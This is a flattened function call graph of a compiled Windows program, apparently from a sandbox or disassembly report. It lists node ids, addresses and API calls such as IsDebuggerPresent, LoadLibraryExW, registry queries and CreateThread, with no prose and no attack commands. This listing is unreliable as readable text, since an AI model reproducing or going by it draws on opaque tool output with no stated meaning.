99400->99341 99402 aa9001 99401->99402 99407 aa8e89 99402->99407 99406 aa901c 99406->99344 99408 aa8ea3 _memset ___raise_securityfailure 99407->99408 99409 aa8ec3 IsDebuggerPresent 99408->99409 99415 aaa385 SetUnhandledExceptionFilter UnhandledExceptionFilter 99409->99415 99412 aa8f87 ___raise_securityfailure 99416 aac826 99412->99416 99413 aa8faa 99414 aaa370 GetCurrentProcess TerminateProcess 99413->99414 99414->99406 99415->99412 99417 aac82e 99416->99417 99418 aac830 IsProcessorFeaturePresent 99416->99418 99417->99413 99420 ab5b3a 99418->99420 99423 ab5ae9 5 API calls ___raise_securityfailure 99420->99423 99422 ab5c1d 99422->99413 99423->99422 99425 aaa704 EncodePointer 99424->99425 99425->99425 99426 aaa71e 99425->99426 99426->99348 99428 aa9e3b __lock 58 API calls 99427->99428 99429 aa35a7 DecodePointer EncodePointer 99428->99429 99492 aa9fa5 LeaveCriticalSection 99429->99492 99431 a96004 99432 aa3604 99431->99432 99433 aa3628 99432->99433 99434 aa360e 99432->99434 99433->99358 99434->99433 99493 aa8d58 58 API calls __getptd_noexit 99434->99493 99436 aa3618 99494 aa8fe6 9 API calls __vswprintf_l 99436->99494 99438 aa3623 99438->99358 99439->99360 99441 a9524d __write_nolock 99440->99441 99442 a91207 59 API calls 99441->99442 99443 a95258 GetCurrentDirectoryW 99442->99443 99495 a94ec8 99443->99495 99445 a9527e IsDebuggerPresent 99446 a9528c 99445->99446 99447 ad0b21 MessageBoxA 99445->99447 99448 ad0b39 99446->99448 99449 a952a0 99446->99449 99447->99448 99618 a9314d 59 API calls Mailbox 99448->99618 99563 a931bf 99449->99563 99452 ad0b49 99459 ad0b5f SetCurrentDirectoryW 99452->99459 99458 a9536c Mailbox 99458->99362 99459->99458 99492->99431 99493->99436 99494->99438 99496 a91207 59 API calls 99495->99496 99497 a94ede 99496->99497 99628 a95420 99497->99628 99499 a94efc 99500 a919e1 59 API calls 99499->99500 99501 a94f10 99500->99501 99502 a91c9c 59 API calls 99501->99502 99503 a94f1b 99502->99503 99642 a8477a 99503->99642 99506 a91a36 59 API calls 99507 a94f34 99506->99507 99508 a839be 68 API calls 99507->99508 99509 a94f44 Mailbox 99508->99509 99510 a91a36 59 API calls 99509->99510 99511 a94f68 99510->99511 99512 a839be 68 API calls 99511->99512 99513 a94f77 Mailbox 99512->99513 99514 a91207 59 API calls 99513->99514 99515 a94f94 99514->99515 99645 a955bc 99515->99645 99518 aa312d _W_store_winword 60 API calls 99519 a94fae 99518->99519 99520 a94fb8 99519->99520 99521 ad0a54 99519->99521 99522 aa312d _W_store_winword 60 API calls 99520->99522 99523 a955bc 59 API calls 99521->99523 99524 a94fc3 99522->99524 99525 ad0a68 99523->99525 99524->99525 99526 a94fcd 99524->99526 99527 a955bc 59 API calls 99525->99527 99528 aa312d _W_store_winword 60 API calls 99526->99528 99529 ad0a84 99527->99529 99530 a94fd8 99528->99530 99532 aa00cf 61 API calls 99529->99532 99530->99529 99531 a94fe2 99530->99531 99533 aa312d _W_store_winword 60 API calls 99531->99533 99534 ad0aa7 99532->99534 99535 a94fed 99533->99535 99536 a955bc 59 API calls 99534->99536 99537 ad0ad0 99535->99537 99538 a94ff7 99535->99538 99539 ad0ab3 99536->99539 99541 a955bc 59 API calls 99537->99541 99540 a9501b 99538->99540 99544 a91c9c 59 API calls 99538->99544 99543 a91c9c 59 API calls 99539->99543 99548 a847be 59 API calls 99540->99548 99542 ad0aee 99541->99542 99545 a91c9c 59 API calls 99542->99545 99546 ad0ac1 99543->99546 99547 a9500e 99544->99547 99550 ad0afc 99545->99550 99551 a955bc 59 API calls 99546->99551 99552 a955bc 59 API calls 99547->99552 99549 a9502a 99548->99549 99553 a84540 59 API calls 99549->99553 99554 a955bc 59 API calls 99550->99554 99551->99537 99552->99540 99555 a95038 99553->99555 99556 ad0b0b 99554->99556 99651 a843d0 99555->99651 99556->99556 99558 a8477a 59 API calls 99560 a95055 99558->99560 99559 a843d0 59 API calls 99559->99560 99560->99558 99560->99559 99561 a955bc 59 API calls 99560->99561 99562 a9509b Mailbox 99560->99562 99561->99560 99562->99445 99564 a931cc __write_nolock 99563->99564 99565 ad0314 _memset 99564->99565 99566 a931e5 99564->99566 99569 ad0330 GetOpenFileNameW 99565->99569 99567 aa0284 60 API calls 99566->99567 99568 a931ee 99567->99568 99667 aa09c5 99568->99667 99571 ad037f 99569->99571 99573 a91821 59 API calls 99571->99573 99574 ad0394 99573->99574 99574->99574 99576 a93203 99685 a9278a 99576->99685 99618->99452 99629 a9542d __write_nolock 99628->99629 99630 a95590 Mailbox 99629->99630 99631 a91821 59 API calls 99629->99631 99630->99499 99633 a9545f 99631->99633 99632 a91609 59 API calls 99632->99633 99633->99632 99641 a95495 Mailbox 99633->99641 99634 a91609 59 API calls 99634->99641 99635 a95563 99635->99630 99636 a91a36 59 API calls 99635->99636 99637 a95584 99636->99637 99639 a94c94 59 API calls 99637->99639 99638 a91a36 59 API calls 99638->99641 99639->99630 99641->99630 99641->99634 99641->99635 99641->99638 99660 a94c94 99641->99660 99643 aa0fe6 Mailbox 59 API calls 99642->99643 99644 a84787 99643->99644 99644->99506 99646 a955df 99645->99646 99647 a955c6 99645->99647 99649 a91821 59 API calls 99646->99649 99648 a91c9c 59 API calls 99647->99648 99650 a94fa0 99648->99650 99649->99650 99650->99518 99652 abd6c9 99651->99652 99655 a843e7 99651->99655 99652->99655 99666 a840cb 59 API calls Mailbox 99652->99666 99654 a844ef 99654->99560 99655->99654 99656 a844e8 99655->99656 99657 a84530 99655->99657 99659 aa0fe6 Mailbox 59 API calls 99656->99659 99658 a8523c 59 API calls 99657->99658 99658->99654 99659->99654 99661 a94ca2 99660->99661 99665 a94cc4 _memmove 99660->99665 99663 aa0fe6 Mailbox 59 API calls 99661->99663 99662 aa0fe6 Mailbox 59 API calls 99664 a94cd8 99662->99664 99663->99665 99664->99641 99665->99662 99666->99655 99668 ab1b70 __write_nolock 99667->99668 99669 aa09d2 GetLongPathNameW 99668->99669 99670 a91821 59 API calls 99669->99670 99671 a931f7 99670->99671 99672 a92f3d 99671->99672 99673 a91207 59 API calls 99672->99673 99674 a92f4f 99673->99674 99675 aa0284 60 API calls 99674->99675 99676 a92f5a 99675->99676 99677 ad0177 99676->99677 99678 a92f65 99676->99678 99682 ad0191 99677->99682 99725 a9151f 61 API calls 99677->99725 99680 a94c94 59 API calls 99678->99680 99681 a92f71 99680->99681 99719 a81307 99681->99719 99684 a92f84 Mailbox 99684->99576 99726 a949c2 99685->99726 99688 acf8d6 99842 ae9b16 99688->99842 99689 a949c2 136 API calls 99691 a927c3 99689->99691 99691->99688 99693 a927cb 99691->99693 99697 a927d7 99693->99697 99698 acf8f3 99693->99698 99694 acf908 99696 aa0fe6 Mailbox 59 API calls 99694->99696 99695 acf8eb 99900 a94a2f 99695->99900 99708 acf94d Mailbox 99696->99708 99750 a929be 99697->99750 99906 ae47e8 90 API calls _wprintf 99698->99906 99702 acf901 99702->99694 99704 acfb01 99705 aa2f85 _free 58 API calls 99704->99705 99708->99704 99709 acfb12 99708->99709 99716 a91a36 59 API calls 99708->99716 99877 adfef8 99708->99877 99880 ae793a 99708->99880 99886 a9343f 99708->99886 99894 a93297 99708->99894 99907 adfe19 61 API calls 2 library calls 99708->99907 99716->99708 99720 a81319 99719->99720 99724 a81338 _memmove 99719->99724 99722 aa0fe6 Mailbox 59 API calls 99720->99722 99721 aa0fe6 Mailbox 59 API calls 99723 a8134f 99721->99723 99722->99724 99723->99684 99724->99721 99725->99677 99909 a94b29 99726->99909 99731 a949ed LoadLibraryExW 99919 a94ade 99731->99919 99732 ad08bb 99733 a94a2f 84 API calls 99732->99733 99736 ad08c2 99733->99736 99738 a94ade 3 API calls 99736->99738 99740 ad08ca 99738->99740 99739 a94a14 99739->99740 99741 a94a20 99739->99741 99945 a94ab2 99740->99945 99742 a94a2f 84 API calls 99741->99742 99744 a927af 99742->99744 99744->99688 99744->99689 99747 ad08f1 99953 a94a6e 99747->99953 99749 ad08fe 99751 acfd14 99750->99751 99752 a929e7 99750->99752 100327 adff5c 89 API calls 4 library calls 99751->100327 100310 a93df7 60 API calls Mailbox 99752->100310 99755 a92a09 100311 a93e47 67 API calls 99755->100311 99756 acfd27 100328 adff5c 89 API calls 4 library calls 99756->100328 99758 a92a1e 99758->99756 99759 a92a26 99758->99759 99762 acfd43 99765 a92a93 99762->99765 99843 a94a8c 85 API calls 99842->99843 99844 ae9b85 99843->99844 100336 ae9cf1 99844->100336 99847 a94ab2 74 API calls 99848 ae9bb4 99847->99848 99849 a94ab2 74 API calls 99848->99849 99850 ae9bc4 99849->99850 99876 acf8e7 99876->99694 99876->99695 99878 aa0fe6 Mailbox 59 API calls 99877->99878 99881 ae7945 99880->99881 99887 a934df 99886->99887 99890 a93452 _memmove 99886->99890 99895 a932aa 99894->99895 99898 a93358 99894->99898 99898->99708 99906->99702 99907->99708 99958 a94b77 99909->99958 99912 a949d4 99916 aa547b 99912->99916 99913 a94b60 FreeLibrary 99913->99912 99914 a94b77 2 API calls 99915 a94b50 99914->99915 99915->99912 99915->99913 99962 aa5490 99916->99962 99918 a949e1 99918->99731 99918->99732 100043 a94baa 99919->100043 99922 a94baa 2 API calls 99925 a94b03 99922->99925 99923 a94a05 99926 a948b0 99923->99926 99924 a94b15 FreeLibrary 99924->99923 99925->99923 99925->99924 99927 aa0fe6 Mailbox 59 API calls 99926->99927 99928 a948c5 99927->99928 99929 a9433f 59 API calls 99928->99929 99930 a948d1 _memmove 99929->99930 99931 a9490c 99930->99931 99932 ad080a 99930->99932 99934 a94a6e 69 API calls 99931->99934 99933 ad0817 99932->99933 100052 ae9ed8 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 99932->100052 100053 ae9f5e 95 API calls 99933->100053 99944 a94915 99934->99944 99937 a94ab2 74 API calls 99937->99944 99938 ad0859 100047 a94a8c 99938->100047 99941 a949a0 99941->99739 99942 a94a8c 85 API calls 99942->99944 99943 a94ab2 74 API calls 99943->99941 99944->99937 99944->99938 99944->99941 99944->99942 99946 ad0945 99945->99946 99947 a94ac4 99945->99947 100159 aa5802 99947->100159 99950 ae96c4 100284 ae951a 99950->100284 99952 ae96da 99952->99747 99954 a94a7d 99953->99954 99955 ad0908 99953->99955 100289 aa5e80 99954->100289 99957 a94a85 99957->99749 99959 a94b44 99958->99959 99960 a94b80 LoadLibraryA 99958->99960 99959->99914 99959->99915 99960->99959 99961 a94b91 GetProcAddress 99960->99961 99961->99959 99964 aa549c __setmode 99962->99964 99963 aa54af 100011 aa8d58 58 API calls __getptd_noexit 99963->100011 99964->99963 99966 aa54e0 99964->99966 99981 ab0718 99966->99981 99967 aa54b4 100012 aa8fe6 9 API calls __vswprintf_l 99967->100012 99970 aa54e5 99971 aa54fb 99970->99971 99972 aa54ee 99970->99972 99974 aa5525 99971->99974 99975 aa5505 99971->99975 100013 aa8d58 58 API calls __getptd_noexit 99972->100013 99996 ab0837 99974->99996 100014 aa8d58 58 API calls __getptd_noexit 99975->100014 99976 aa54bf @_EH4_CallFilterFunc@8 __setmode 99976->99918 99982 ab0724 __setmode 99981->99982 99983 aa9e3b __lock 58 API calls 99982->99983 99994 ab0732 99983->99994 99984 ab07a6 100016 ab082e 99984->100016 99985 ab07ad 100021 aa8a4d 58 API calls __malloc_crt 99985->100021 99988 ab07b4 99988->99984 100022 aaa05b InitializeCriticalSectionAndSpinCount 99988->100022 99989 ab0823 __setmode 99989->99970 99991 aa9ec3 __mtinitlocknum 58 API calls 99991->99994 99993 ab07da EnterCriticalSection 99993->99984 99994->99984 99994->99985 99994->99991 100019 aa6e7d 59 API calls __lock 99994->100019 100020 aa6ee7 LeaveCriticalSection LeaveCriticalSection _doexit 99994->100020 99997 ab0857 __wopenfile 99996->99997 99998 ab0871 99997->99998 100010 ab0a2c 99997->100010 100029 aa39fb 60 API calls 2 library calls 99997->100029 100027 aa8d58 58 API calls __getptd_noexit 99998->100027 100000 ab0876 100028 aa8fe6 9 API calls __vswprintf_l 100000->100028 100002 ab0a8f 100024 ab87d1 100002->100024 100004 aa5530 100015 aa5552 LeaveCriticalSection LeaveCriticalSection __wfsopen 100004->100015 100006 ab0a25 100006->100010 100030 aa39fb 60 API calls 2 library calls 100006->100030 100008 ab0a44 100008->100010 100031 aa39fb 60 API calls 2 library calls 100008->100031 100010->99998 100010->100002 100011->99967 100012->99976 100013->99976 100014->99976 100015->99976 100023 aa9fa5 LeaveCriticalSection 100016->100023 100018 ab0835 100018->99989 100019->99994 100020->99994 100021->99988 100022->99993 100023->100018 100032 ab7fb5 100024->100032 100026 ab87ea 100026->100004 100027->100000 100028->100004 100029->100006 100030->100008 100031->100010 100033 ab7fc1 __setmode 100032->100033 100034 ab7fd7 100033->100034 100037 ab800d 100033->100037 100035 aa8d58 __vswprintf_l 58 API calls 100034->100035 100036 ab7fdc 100035->100036 100039 aa8fe6 __vswprintf_l 9 API calls 100036->100039 100038 ab807e __wsopen_nolock 109 API calls 100037->100038 100040 ab8029 100038->100040 100042 ab7fe6 __setmode 100039->100042 100041 ab8052 __wsopen_helper LeaveCriticalSection 100040->100041 100041->100042 100042->100026 100044 a94af7 100043->100044 100045 a94bb3 LoadLibraryA 100043->100045 100044->99922 100044->99925 100045->100044 100046 a94bc4 GetProcAddress 100045->100046 100046->100044 100048 a94a9b 100047->100048 100049 ad0923 100047->100049 100054 aa5a6d 100048->100054 100051 a94aa9 100051->99943 100052->99933 100053->99944 100056 aa5a79 __setmode 100054->100056 100055 aa5a8b 100085 aa8d58 58 API calls __getptd_noexit 100055->100085 100056->100055 100058 aa5ab1 100056->100058 100067 aa6e3e 100058->100067 100059 aa5a90 100086 aa8fe6 9 API calls __vswprintf_l 100059->100086 100066 aa5a9b __setmode 100066->100051 100068 aa6e4e 100067->100068 100069 aa6e70 EnterCriticalSection 100067->100069 100068->100069 100070 aa6e56 100068->100070 100072 aa5ab7 100069->100072 100071 aa9e3b __lock 58 API calls 100070->100071 100071->100072 100073 aa59de 100072->100073 100074 aa59fc 100073->100074 100075 aa59ec 100073->100075 100077 aa5a12 100074->100077 100088 aa5af0 100074->100088 100158 aa8d58 58 API calls __getptd_noexit 100075->100158 100117 aa4c5d 100077->100117 100084 aa59f1 100087 aa5ae8 LeaveCriticalSection LeaveCriticalSection __wfsopen 100084->100087 100085->100059 100086->100066 100087->100066 100089 aa5afd __write_nolock 100088->100089 100090 aa5b2d 100089->100090 100091 aa5b15 100089->100091 100093 aa4906 __flsbuf 58 API calls 100090->100093 100092 aa8d58 __vswprintf_l 58 API calls 100091->100092 100118 aa4c70 100117->100118 100122 aa4c94 100117->100122 100119 aa4906 __flsbuf 58 API calls 100118->100119 100118->100122 100120 aa4c8d 100119->100120 100123 aa4906 100122->100123 100124 aa4910 100123->100124 100125 aa4925 100123->100125 100158->100084 100162 aa581d 100159->100162 100161 a94ad5 100161->99950 100163 aa5829 __setmode 100162->100163 100164 aa5864 __setmode 100163->100164 100165 aa583f _memset 100163->100165 100166 aa586c 100163->100166 100164->100161 100189 aa8d58 58 API calls __getptd_noexit 100165->100189 100167 aa6e3e __lock_file 59 API calls 100166->100167 100168 aa5872 100167->100168 100175 aa563d 100168->100175 100171 aa5859 100190 aa8fe6 9 API calls __vswprintf_l 100171->100190 100176 aa5673 100175->100176 100179 aa5658 _memset 100175->100179 100191 aa58a6 LeaveCriticalSection LeaveCriticalSection __wfsopen 100176->100191 100177 aa5663 100280 aa8d58 58 API calls __getptd_noexit 100177->100280 100179->100176 100179->100177 100182 aa56b3 100179->100182 100182->100176 100184 aa4906 __flsbuf 58 API calls 100182->100184 100186 aa57c4 _memset 100182->100186 100192 ab108b 100182->100192 100260 ab0dd7 100182->100260 100282 ab0ef8 58 API calls 3 library calls 100182->100282 100184->100182 100283 aa8d58 58 API calls __getptd_noexit 100186->100283 100188 aa5668 100281 aa8fe6 9 API calls __vswprintf_l 100188->100281 100189->100171 100190->100164 100191->100164 100193 ab10ac 100192->100193 100194 ab10c3 100192->100194 100195 aa8d24 __commit 58 API calls 100193->100195 100196 ab17fb 100194->100196 100200 ab10fd 100194->100200 100197 ab10b1 100195->100197 100198 aa8d24 __commit 58 API calls 100196->100198 100199 aa8d58 __vswprintf_l 58 API calls 100197->100199 100201 ab1800 100198->100201 100204 ab10b8 100199->100204 100202 ab1105 100200->100202 100209 ab111c 100200->100209 100203 aa8d58 __vswprintf_l 58 API calls 100201->100203 100205 aa8d24 __commit 58 API calls 100202->100205 100206 ab1111 100203->100206 100204->100182 100207 ab110a 100205->100207 100208 aa8fe6 __vswprintf_l 9 API calls 100206->100208 100213 aa8d58 __vswprintf_l 58 API calls 100207->100213 100208->100204 100209->100204 100210 ab1131 100209->100210 100212 ab114b 100209->100212 100215 ab1169 100209->100215 100211 aa8d24 __commit 58 API calls 100210->100211 100211->100207 100212->100210 100214 ab1156 100212->100214 100213->100206 100217 ab5e9b __flsbuf 58 API calls 100214->100217 100216 aa8a4d __malloc_crt 58 API calls 100215->100216 100218 ab1179 100216->100218 100221 ab126a 100217->100221 100219 ab119c 100218->100219 100220 ab1181 100218->100220 100224 ab1af1 __lseeki64_nolock 60 API calls 100219->100224 100222 aa8d58 __vswprintf_l 58 API calls 100220->100222 100223 ab12e3 ReadFile 100221->100223 100228 ab1280 GetConsoleMode 100221->100228 100225 ab1186 100222->100225 100226 ab17c3 GetLastError 100223->100226 100227 ab1305 100223->100227 100224->100214 100229 aa8d24 __commit 58 API calls 100225->100229 100230 ab17d0 100226->100230 100235 ab12c3 100226->100235 100227->100226 100237 ab12d5 100227->100237 100231 ab12e0 100228->100231 100232 ab1294 100228->100232 100229->100204 100233 aa8d58 __vswprintf_l 58 API calls 100230->100233 100231->100223 100232->100231 100234 ab129a ReadConsoleW 100232->100234 100236 ab17d5 100233->100236 100234->100237 100238 ab12bd GetLastError 100234->100238 100239 aa8d37 __dosmaperr 58 API calls 100235->100239 100242 ab12c9 100235->100242 100240 aa8d24 __commit 58 API calls 100236->100240 100237->100242 100243 ab133a 100237->100243 100252 ab15a7 100237->100252 100238->100235 100239->100242 100240->100242 100241 aa2f85 _free 58 API calls 100241->100204 100242->100204 100242->100241 100244 ab13a6 ReadFile 100243->100244 100250 ab1427 100243->100250 100246 ab13c7 GetLastError 100244->100246 100259 ab13d1 100244->100259 100246->100259 100247 ab14e4 100254 ab1494 MultiByteToWideChar 100247->100254 100248 ab14d4 100249 ab16ad ReadFile 100253 ab16d0 GetLastError 100249->100253 100257 ab16de 100249->100257 100250->100242 100250->100247 100250->100248 100250->100254 100252->100242 100252->100249 100253->100257 100254->100238 100254->100242 100257->100252 100259->100243 100261 ab0de2 100260->100261 100266 ab0df7 100260->100266 100262 aa8d58 __vswprintf_l 58 API calls 100261->100262 100264 ab0de7 100262->100264 100263 ab0df2 100263->100182 100265 aa8fe6 __vswprintf_l 9 API calls 100264->100265 100265->100263 100266->100263 100267 ab0e2c 100266->100267 100268 ab6214 __getbuf 58 API calls 100266->100268 100269 aa4906 __flsbuf 58 API calls 100267->100269 100268->100267 100270 ab0e40 100269->100270 100271 ab0f77 __read 72 API calls 100270->100271 100272 ab0e47 100271->100272 100272->100263 100273 aa4906 __flsbuf 58 API calls 100272->100273 100274 ab0e6a 100273->100274 100274->100263 100275 aa4906 __flsbuf 58 API calls 100274->100275 100276 ab0e76 100275->100276 100276->100263 100277 aa4906 __flsbuf 58 API calls 100276->100277 100278 ab0e83 100277->100278 100279 aa4906 __flsbuf 58 API calls 100278->100279 100279->100263 100280->100188 100281->100176 100282->100182 100283->100188 100287 aa542a GetSystemTimeAsFileTime 100284->100287 100286 ae9529 100286->99952 100288 aa5458 __aulldiv 100287->100288 100288->100286 100290 aa5e8c __setmode 100289->100290 100291 aa5e9e 100290->100291 100292 aa5eb3 100290->100292 100302 aa8d58 58 API calls __getptd_noexit 100291->100302 100294 aa6e3e __lock_file 59 API calls 100292->100294 100296 aa5eb9 100294->100296 100295 aa5ea3 100303 aa8fe6 9 API calls __vswprintf_l 100295->100303 100298 aa5af0 __ftell_nolock 67 API calls 100296->100298 100299 aa5ec4 100298->100299 100304 aa5ee4 LeaveCriticalSection LeaveCriticalSection __wfsopen 100299->100304 100301 aa5eae __setmode 100301->99957 100302->100295 100303->100301 100304->100301 100310->99755 100311->99758 100327->99756 100328->99762 100338 ae9d05 __tzset_nolock _wcscmp 100336->100338 100337 a94ab2 74 API calls 100337->100338 100338->100337 100339 ae96c4 GetSystemTimeAsFileTime 100338->100339 100340 ae9b99 100338->100340 100341 a94a8c 85 API calls 100338->100341 100339->100338 100340->99847 100340->99876 100341->100338 100517 a94d83 100518 a94dba 100517->100518 100519 a94dd8 100518->100519 100520 a94e37 100518->100520 100521 a94e35 100518->100521 100525 a94ead PostQuitMessage 100519->100525 100526 a94de5 100519->100526 100523 a94e3d 100520->100523 100524 ad09c2 100520->100524 100522 a94e1a DefWindowProcW 100521->100522 100532 a94e28 100522->100532 100527 a94e42 100523->100527 100528 a94e65 SetTimer RegisterWindowMessageW 100523->100528 100572 a8c460 10 API calls Mailbox 100524->100572 100525->100532 100529 ad0a35 100526->100529 100530 a94df0 100526->100530 100533 a94e49 KillTimer 100527->100533 100534 ad0965 100527->100534 100528->100532 100535 a94e8e CreatePopupMenu 100528->100535 100575 ae2cce 97 API calls _memset 100529->100575 100536 a94df8 100530->100536 100537 a94eb7 100530->100537 100542 a95ac3 Shell_NotifyIconW 100533->100542 100540 ad099e MoveWindow 100534->100540 100541 ad096a 100534->100541 100535->100532 100543 ad0a1a 100536->100543 100544 a94e03 100536->100544 100562 a95b29 100537->100562 100539 ad09e9 100573 a8c483 277 API calls Mailbox 100539->100573 100540->100532 100548 ad098d SetFocus 100541->100548 100549 ad096e 100541->100549 100550 a94e5c 100542->100550 100543->100522 100574 ad8854 59 API calls Mailbox 100543->100574 100551 a94e9b 100544->100551 100552 a94e0e 100544->100552 100545 ad0a47 100545->100522 100545->100532 100548->100532 100549->100552 100553 ad0977 100549->100553 100569 a834e4 DeleteObject DestroyWindow Mailbox 100550->100569 100570 a95bd7 107 API calls _memset 100551->100570 100552->100522 100559 a95ac3 Shell_NotifyIconW 100552->100559 100571 a8c460 10 API calls Mailbox 100553->100571 100558 a94eab 100558->100532 100560 ad0a0e 100559->100560 100561 a959d3 94 API calls 100560->100561 100561->100521 100563 a95b40 _memset 100562->100563 100564 a95bc2 100562->100564 100565 a956f8 87 API calls 100563->100565 100564->100532 100567 a95b67 100565->100567 100566 a95bab KillTimer SetTimer 100566->100564 100567->100566 100568 ad0d6e Shell_NotifyIconW 100567->100568 100568->100566 100569->100532 100570->100558 100571->100532 100572->100539 100573->100552 100574->100521 100575->100545 100576 a81066 100581 a8aaaa 100576->100581 100578 a8106c 100579 aa2f70 __cinit 67 API calls 100578->100579 100580 a81076 100579->100580 100582 a8aacb 100581->100582 100614 aa02eb 100582->100614 100586 a8ab12 100587 a91207 59 API calls 100586->100587 100588 a8ab1c 100587->100588 100589 a91207 59 API calls 100588->100589 100590 a8ab26 100589->100590 100591 a91207 59 API calls 100590->100591 100592 a8ab30 100591->100592 100593 a91207 59 API calls 100592->100593 100594 a8ab6e 100593->100594 100595 a91207 59 API calls 100594->100595 100596 a8ac39 100595->100596 100624 aa0588 100596->100624 100600 a8ac6b 100601 a91207 59 API calls 100600->100601 100602 a8ac75 100601->100602 100652 a9fe2b 100602->100652 100604 a8acbc 100605 a8accc GetStdHandle 100604->100605 100606 a8ad18 100605->100606 100607 ac2f39 100605->100607 100608 a8ad20 OleInitialize 100606->100608 100607->100606 100609 ac2f42 100607->100609 100608->100578 100659 ae70f3 64 API calls Mailbox 100609->100659 100611 ac2f49 100660 ae77c2 CreateThread 100611->100660 100613 ac2f55 CloseHandle 100613->100608 100661 aa03c4 100614->100661 100617 aa03c4 59 API calls 100618 aa032d 100617->100618 100619 a91207 59 API calls 100618->100619 100620 aa0339 100619->100620 100621 a91821 59 API calls 100620->100621 100622 a8aad1 100621->100622 100623 aa07bb 6 API calls 100622->100623 100623->100586 100625 a91207 59 API calls 100624->100625 100626 aa0598 100625->100626 100627 a91207 59 API calls 100626->100627 100628 aa05a0 100627->100628 100668 a910c3 100628->100668 100631 a910c3 59 API calls 100632 aa05b0 100631->100632 100633 a91207 59 API calls 100632->100633 100634 aa05bb 100633->100634 100635 aa0fe6 Mailbox 59 API calls 100634->100635 100636 a8ac43 100635->100636 100637 a9ff4c 100636->100637 100638 a9ff5a 100637->100638 100639 a91207 59 API calls 100638->100639 100640 a9ff65 100639->100640 100641 a91207 59 API calls 100640->100641 100642 a9ff70 100641->100642 100643 a91207 59 API calls 100642->100643 100644 a9ff7b 100643->100644 100645 a91207 59 API calls 100644->100645 100646 a9ff86 100645->100646 100647 a910c3 59 API calls 100646->100647 100648 a9ff91 100647->100648 100649 aa0fe6 Mailbox 59 API calls 100648->100649 100650 a9ff98 RegisterWindowMessageW 100649->100650 100650->100600 100653 ad620c 100652->100653 100654 a9fe3b 100652->100654 100671 aea12a 59 API calls 100653->100671 100655 aa0fe6 Mailbox 59 API calls 100654->100655 100657 a9fe43 100655->100657 100657->100604 100658 ad6217 100659->100611 100660->100613 100672 ae77a8 65 API calls 100660->100672 100662 a91207 59 API calls 100661->100662 100663 aa03cf 100662->100663 100664 a91207 59 API calls 100663->100664 100665 aa03d7 100664->100665 100666 a91207 59 API calls 100665->100666 100667 aa0323 100666->100667 100667->100617 100669 a91207 59 API calls 100668->100669 100670 a910cb 100669->100670 100670->100631 100671->100658 100673 abdc5a 100674 aa0fe6 Mailbox 59 API calls 100673->100674 100675 abdc61 100674->100675 100676 abdc7a _memmove 100675->100676 100677 aa0fe6 Mailbox 59 API calls 100675->100677 100678 aa0fe6 Mailbox 59 API calls 100676->100678 100677->100676 100679 abdc9f 100678->100679 100680 a8107d 100685 a92fc5 100680->100685 100682 a8108c 100683 aa2f70 __cinit 67 API calls 100682->100683 100684 a81096 100683->100684 100686 a92fd5 __write_nolock 100685->100686 100687 a91207 59 API calls 100686->100687 100688 a9308b 100687->100688 100689 aa00cf 61 API calls 100688->100689 100690 a93094 100689->100690 100716 aa08c1 100690->100716 100693 a91900 59 API calls 100694 a930ad 100693->100694 100695 a94c94 59 API calls 100694->100695 100696 a930bc 100695->100696 100697 a91207 59 API calls 100696->100697 100698 a930c5 100697->100698 100699 a919e1 59 API calls 100698->100699 100700 a930ce RegOpenKeyExW 100699->100700 100701 ad01a3 RegQueryValueExW 100700->100701 100705 a930f0 Mailbox 100700->100705 100702 ad0235 RegCloseKey 100701->100702 100703 ad01c0 100701->100703 100702->100705 100715 ad0247 _wcscat Mailbox __NMSG_WRITE 100702->100715 100704 aa0fe6 Mailbox 59 API calls 100703->100704 100706 ad01d9 100704->100706 100705->100682 100707 a9433f 59 API calls 100706->100707 100708 ad01e4 RegQueryValueExW 100707->100708 100710 ad0201 100708->100710 100712 ad021b 100708->100712 100709 a91609 59 API calls 100709->100715 100711 a91821 59 API calls 100710->100711 100711->100712 100712->100702 100713 a91a36 59 API calls 100713->100715 100714 a94c94 59 API calls 100714->100715 100715->100705 100715->100709 100715->100713 100715->100714 100717 ab1b70 __write_nolock 100716->100717 100718 aa08ce GetFullPathNameW 100717->100718 100719 aa08f0 100718->100719 100720 a91821 59 API calls 100719->100720 100721 a9309f 100720->100721 100721->100693 100722 a81055 100727 a82a19 100722->100727 100725 aa2f70 __cinit 67 API calls 100726 a81064 100725->100726 100728 a91207 59 API calls 100727->100728 100729 a82a87 100728->100729 100734 a81256 100729->100734 100732 a82b24 100733 a8105a 100732->100733 100737 a813f8 59 API calls 2 library calls 100732->100737 100733->100725 100738 a81284 100734->100738 100737->100732 100739 a81291 100738->100739 100740 a81275 100738->100740 100739->100740 100741 a81298 RegOpenKeyExW 100739->100741 100740->100732 100741->100740 100742 a812b2 RegQueryValueExW 100741->100742 100743 a812e8 RegCloseKey 100742->100743 100744 a812d3 100742->100744 100743->100740 100744->100743 100745 a85ff5 100769 a85ede Mailbox _memmove 100745->100769 100746 aa0fe6 59 API calls Mailbox 100746->100769 100747 a86a9b 100871 a8a9de 277 API calls 100747->100871 100748 a853b0 277 API calls 100748->100769 100750 abeff9 100883 a85190 59 API calls Mailbox 100750->100883 100752 abf007 100884 aea48d 89 API calls 4 library calls 100752->100884 100756 abefeb 100782 a85569 Mailbox 100756->100782 100882 ad6cf1 59 API calls Mailbox 100756->100882 100757 a860e5 100758 abe137 100757->100758 100763 a863bd Mailbox 100757->100763 100770 a86abc 100757->100770 100790 a86152 Mailbox 100757->100790 100758->100763 100872 ad7aad 59 API calls 100758->100872 100759 a91c9c 59 API calls 100759->100769 100761 aa0fe6 Mailbox 59 API calls 100766 a863d1 100761->100766 100762 a91a36 59 API calls 100762->100769 100763->100761 100776 a86426 100763->100776 100764 a8523c 59 API calls 100764->100769 100768 a863de 100766->100768 100766->100770 100767 afc355 277 API calls 100767->100769 100771 abe172 100768->100771 100772 a86413 100768->100772 100769->100746 100769->100747 100769->100748 100769->100750 100769->100752 100769->100757 100769->100759 100769->100762 100769->100764 100769->100767 100769->100770 100769->100782 100875 ae7f11 59 API calls Mailbox 100769->100875 100876 ad6cf1 59 API calls Mailbox 100769->100876 100881 aea48d 89 API calls 4 library calls 100770->100881 100873 afc87c 85 API calls 2 library calls 100771->100873 100772->100776 100799 a85447 Mailbox 100772->100799 100874 afc9c9 95 API calls Mailbox 100776->100874 100778 abe19d 100778->100778 100780 abe691 100878 aea48d 89 API calls 4 library calls 100780->100878 100781 abf165 100886 aea48d 89 API calls 4 library calls 100781->100886 100784 a869ff 100784->100780 100784->100781 100785 a86e30 60 API calls 100785->100799 100786 a869fa 100794 a91c9c 59 API calls 